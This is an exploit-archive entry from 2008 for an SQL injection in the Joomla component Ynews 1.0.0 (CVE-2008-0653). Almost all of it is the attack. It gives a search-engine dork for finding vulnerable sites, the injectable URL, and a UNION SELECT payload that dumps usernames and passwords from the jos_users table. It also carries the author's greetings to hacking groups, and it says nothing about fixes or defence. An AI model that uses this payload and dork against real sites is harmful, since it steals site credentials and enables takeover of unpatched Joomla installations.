Joomla! Component Ynews 1.0.0 - 'id' SQL Injection

Author: Crackers_Child
type: webapps
platform: php
port: 
date_added: 2008-02-05  
date_updated:   
verified: 1  
codes: OSVDB-41444;CVE-2008-0653  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 5072.txt  
###########################################################################################
###    Title   : Joomla Component Ynews 1.0.0  (id) Remote SQL Injection Vulnerability
###
###    Author  : By Crackers_Child cashr00t@hotmail.com
###
###    Greetz  : Str0ke,www.biyofrm.com & www.sibersavascilar.com & www.tryag.cc
###
###    Dork    : inurl:index.php?option=com_ynews
###
###    Exploit : /index.php?option=com_ynews&Itemid=0&task=showYNews&id=SQL
###
###    SQL     : -1/**/union/**/select/**/0,1,2,username,password,5,6%20from%20jos_users/*
###
###    Note    : Kac Kere ölDunuz ki " Olum Den Korkmuyorum Ben " Diyebiliyorsunuz . . .
###########################################################################################

# milw0rm.com [2008-02-06]